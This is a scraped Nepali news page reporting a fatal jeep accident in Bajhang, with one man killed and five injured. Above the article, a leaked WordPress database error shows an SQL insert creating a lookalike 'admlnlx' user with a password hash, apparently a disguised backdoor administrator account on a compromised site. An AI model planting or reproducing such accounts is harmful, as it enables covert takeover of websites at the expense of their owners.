WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZonMCdW8WhSAFTbH5Jol/yr9T8/WQ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 22:34:22', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
बझाङमा जीप दुर्घटना हुँदा एक जनाको मृत्यु – Gaule Khabar

बझाङमा जीप दुर्घटना हुँदा एक जनाको मृत्यु

बझाङमा जीप दुर्घटना हुँदा एक जनाको मृत्यु

बझाङ, माघ १५ –

बझाङको काप्डेमा शनिबार बिहान जीप दुर्घटना हुँदा एक जनाको ज्यान गएको छ । सदरमुकाम चैनपुरबाट तल्कोटका लागि छुटेको से १ ज ५६२ नम्बरको जीप जयपृथ्वी नगरपालिका–६ काप्डेको पुल नजिकै दुर्घटना हुँदा रिलु–८ का ४५ का लालबहादुर बोहराको घटना स्थलमा नै ज्यान गएकोे जिल्ला प्रहरी कार्यलयले जनाएको छ । दुर्घटनामा अन्य पाँच जना घाइते भएका छन् । उनीहरुको जिल्ला अस्पताल सिमखेतमा उपचार भइरहेको छ ।

जीपको ब्रेक फेल भएर दुर्घटना भएको हुन सक्ने अनुमान छ । घटना बारे थप अनुसन्धान भइरहेको प्रहरी नायब उपरीक्षक नरेन्द्र चन्दले बताउनुभयो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका